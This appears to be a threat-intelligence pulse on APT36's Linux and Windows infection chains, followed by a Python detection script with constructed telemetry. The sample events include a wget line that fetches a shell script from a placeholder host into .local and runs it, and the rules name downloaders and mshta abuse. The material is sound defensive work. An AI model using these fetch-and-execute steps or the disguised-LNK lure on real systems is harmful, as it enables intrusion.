Pulse: APT36 sample analysis
TLP: WHITE | Author: PetrP.73 | Created: 2025-12-21 | Modified: 2026-01-20
50 IOCs (medium volume)
APT36 has been observed using two distinct methods to execute malware on Linux and Windows, both built around malicious files disguised as legitimate documents. On Linux, the chain begins by creating a `.local` directory with permissions 0755, then downloading three files from a remote URL: `gkt3.1`, `gkt3.sh`, and `APPL FOR UPDATION.pdf`. The `gkt3.sh` script is executed after the download and uses the `xdg-open` command to open the PDF, potentially leading to further exploitation or malware execution. On Windows, APT36 instead uses a malicious shortcut (LNK file) named `APPL FOR UPDATION OF NAME BASED & OFFICIAL NIC E-MAIL ID.pdf.LNK`; the double extension makes it look like a PDF. Opening the shortcut executes the embedded code through `mshta.exe`, a legitimate Windows system binary.
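The behaviours described above translate into a few host-telemetry rules. The following is an added detection example, not tooling from the pulse author; the event schema, the sample events and the `example.invalid` host are constructed for illustration.

```python
import re

# Heuristics derived from the behaviour described above. Assumed event schema
# (constructed for this example): os, kind ('process' | 'file'), image, cmdline,
# parent_cmdline, path.
DOUBLE_EXT_LNK = re.compile(r"\.pdf\.lnk$", re.IGNORECASE)   # PDF-lookalike shortcut
LOCAL_SCRIPT = re.compile(r"(^|/)\.local/\S*\.sh\b")         # shell script under .local
DOWNLOADERS = {"curl", "wget"}

def flag_event(ev):
    """Return the list of rule names an event matches (empty if nothing matched)."""
    reasons = []
    if ev["kind"] == "file" and DOUBLE_EXT_LNK.search(ev.get("path", "")):
        reasons.append("lnk-double-extension")
    if ev["kind"] == "process":
        image = ev.get("image", "").lower()
        cmd, pcmd = ev.get("cmdline", ""), ev.get("parent_cmdline", "")
        if ev["os"] == "windows" and image.endswith("mshta.exe"):
            reasons.append("mshta-execution")          # LOLBin launched via the LNK
        if ev["os"] == "linux":
            if image in DOWNLOADERS and "/.local/" in cmd:
                reasons.append("download-into-dot-local")
            if image in {"sh", "bash"} and LOCAL_SCRIPT.search(cmd):
                reasons.append("script-run-from-dot-local")
            if image == "xdg-open" and LOCAL_SCRIPT.search(pcmd):
                reasons.append("xdg-open-from-dot-local-script")  # PDF opened by the script
    return reasons

def scan(events):
    """Map event index -> matched rules, keeping only events that matched."""
    return {i: r for i, ev in enumerate(events) if (r := flag_event(ev))}

# Constructed sample telemetry (not data from the pulse); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"os": "linux", "kind": "process", "image": "wget",
     "cmdline": "wget -q http://example.invalid/gkt3.sh -O /home/u/.local/gkt3.sh"},
    {"os": "linux", "kind": "process", "image": "sh", "cmdline": "sh /home/u/.local/gkt3.sh"},
    {"os": "linux", "kind": "process", "image": "xdg-open",
     "cmdline": "xdg-open /home/u/.local/APPL FOR UPDATION.pdf",
     "parent_cmdline": "sh /home/u/.local/gkt3.sh"},
    {"os": "linux", "kind": "process", "image": "xdg-open",
     "cmdline": "xdg-open /home/u/Documents/report.pdf", "parent_cmdline": "nautilus"},
    {"os": "windows", "kind": "file",
     "path": r"C:\Users\u\Downloads\APPL FOR UPDATION OF NAME BASED & OFFICIAL NIC E-MAIL ID.pdf.LNK"},
    {"os": "windows", "kind": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe <constructed placeholder>"},
    {"os": "windows", "kind": "file", "path": r"C:\Users\u\Downloads\invoice.pdf"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the wget-into-`.local`, the script execution, the script-spawned `xdg-open`, the double-extension LNK and the `mshta.exe` launch, while the benign PDF open and plain `invoice.pdf` pass.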
Indicators of Compromise (17 / 50 total)